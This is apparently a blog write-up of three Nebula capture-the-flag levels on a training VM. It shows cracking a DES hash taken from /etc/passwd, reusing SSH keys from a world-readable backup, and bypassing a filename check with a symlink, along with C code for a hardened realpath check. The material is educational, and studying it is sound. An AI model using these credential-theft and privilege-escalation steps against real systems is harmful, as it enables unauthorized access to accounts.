Exploit Exercises Nebula — level06

“(…) account credentials came from a legacy unix system” mhm:

$ cat /etc/passwd
(...)
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
(...)

Ah, good old DES:

$ echo ueqwOCnSGdsuM > flag06.des
$ ./john flag06.des --show
?:hello

thus:

$ su flag06
sh-4.2$ getflag
You have successfully executed getflag on a target account

Nice one.

Exploit Exercises Nebula — level05

From the description we get one hint: weak permissions. And this is sufficient to easily solve this challenge.

First things first: navigate to /home/flag05 and try to list its contents:

$ cd /home/flag05
$ ls
$

That’s odd. It looks like it’s empty. Let’s try to list *all*:

$ ls -al /home/flag05
total 36
drwxr-x--- 5 flag05 level05 4096 2013-02-26 15:45 .
drwxr-xr-x 43 root root 4096 2011-11-20 20:21 ..
drwxr-xr-x 2 flag05 flag05 4096 2011-11-20 20:13 .backup
-rw------- 1 flag05 flag05 36 2013-02-26 15:46 .bash_history
-rw-r--r-- 1 flag05 flag05 220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag05 flag05 3353 2011-05-18 02:54 .bashrc
drwx------ 2 flag05 flag05 4096 2013-02-26 15:45 .cache
-rw-r--r-- 1 flag05 flag05 675 2011-05-18 02:54 .profile
drwx------ 2 flag05 flag05 4096 2011-11-20 20:13 .ssh

Now, that’s better! It is also easy to connect the initial hint with the permissions on .ssh and .backup: .ssh is private to flag05, but .backup is readable and traversable by everyone. Let’s see what’s in .backup:

$ ls -al /home/flag05/.backup
total 12
drwxr-xr-x 2 flag05 flag05 4096 2011-11-20 20:13 .
drwxr-x--- 5 flag05 level05 4096 2013-02-26 15:45 ..
-rw-rw-r-- 1 flag05 flag05 1826 2011-11-20 20:13 backup-19072011.tgz

So we have a backup archive which everyone can read. Copy it to our home directory and see what’s inside:

$ cp /home/flag05/.backup/backup-19072011.tgz ~/
$ tar -zxvf ~/backup-19072011.tgz
$ ls -al ~/
total 36
drwxr-x--- 4 level05 level05 4096 2013-02-26 15:46 .
drwxr-xr-x 43 root root 4096 2011-11-20 20:21 ..
-rw-rw-r-- 1 level05 level05 1826 2013-02-26 14:08 backup-19072011.tgz
-rw------- 1 level05 level05 705 2013-02-26 15:42 .bash_history
-rw-r--r-- 1 level05 level05 220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 level05 level05 3353 2011-05-18 02:54 .bashrc
drwx------ 2 level05 level05 4096 2013-02-26 13:48 .cache
-rw-r--r-- 1 level05 level05 675 2011-05-18 02:54 .profile
drwxr-xr-x 2 level05 level05 4096 2013-02-26 15:46 .ssh

We can see that we have obtained the .ssh directory, which contains SSH keys; combining this with the previous challenge, we can try connecting to localhost as the flag05 account:

$ ssh -l flag05 localhost
flag05@localhost$ getflag
You have successfully executed getflag on a target account

Easy-peasy.

Exploit Exercises Nebula — level04

Mirroring exploit-exercises in each entry is pointless, so from now on I’ll just focus on writing solutions.

Our task in this level is to read /home/flag04/token using /home/flag04/flag04; however, the following lines try to prevent it:

    if(strstr(argv[1], "token") != NULL) {
        printf("You may not access '%s'\n", argv[1]);
        exit(EXIT_FAILURE);
    }

It is plain to see that they only check for the string “token” in the provided argument, not in the path it actually resolves to, so a symlink will suffice.

$ ln -s /home/flag04/token /home/level04/fake
$ /home/flag04/flag04 /home/level04/fake
06508b5e-8909-4f38-b630-fdb148a848a2
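To show why a substring check on the argument text is the wrong control, here is an added example (not part of the Nebula level source) that puts the original strstr check next to one that resolves the path with realpath(3) before inspecting it; the temporary directory, token file and symlink it builds are constructed for the demo, and main() is only there so it runs stand-alone.

```c
#define _XOPEN_SOURCE 700
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#ifndef PATH_MAX
#define PATH_MAX 4096
#endif

/* The level04 check: only the literal argument text is inspected. */
int blocked_by_name(const char *arg) {
    return strstr(arg, "token") != NULL;
}

/* Hardened check: resolve symlinks and ".." first, then inspect the
   canonical path. Unresolvable paths are refused (fail closed). */
int blocked_by_realpath(const char *arg) {
    char resolved[PATH_MAX];
    if (realpath(arg, resolved) == NULL)
        return 1;
    return strstr(resolved, "token") != NULL;
}

/* Constructed demo: creates <tmpdir>/token and a symlink <tmpdir>/fake
   pointing at it, then returns 1 when the symlink slips past the name
   check but is caught by the realpath check (-1 on setup failure). */
int demo_symlink_bypass(void) {
    char dir[] = "/tmp/lvl04-XXXXXX";   /* hypothetical scratch dir */
    char token[PATH_MAX], fake[PATH_MAX];
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(token, sizeof token, "%s/token", dir);
    snprintf(fake, sizeof fake, "%s/fake", dir);
    FILE *f = fopen(token, "w");
    if (f == NULL) return -1;
    fputs("constructed-token\n", f);
    fclose(f);
    if (symlink(token, fake) != 0) return -1;
    int by_name = blocked_by_name(fake);      /* 0: "fake" contains no "token" */
    int by_real = blocked_by_realpath(fake);  /* 1: resolves to .../token */
    unlink(fake); unlink(token); rmdir(dir);
    return by_name == 0 && by_real == 1;
}

int main(void) {
    printf("bypass caught only by realpath check: %d\n", demo_symlink_bypass());
    return 0;
}
```

Even the realpath variant is still a check-then-open sequence, so the more robust fix is to open the file and compare its st_dev/st_ino from fstat with those of the protected file rather than matching on a name at all.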

Now, after receiving the contents of the token file, I was confused. The question was “What should I do with it?”, but IRC came to the rescue; apparently switching user to flag04 with 06508b5e-8909-4f38-b630-fdb148a848a2 as the password works and is a valid solution, so one can run /bin/getflag with flag04 privileges.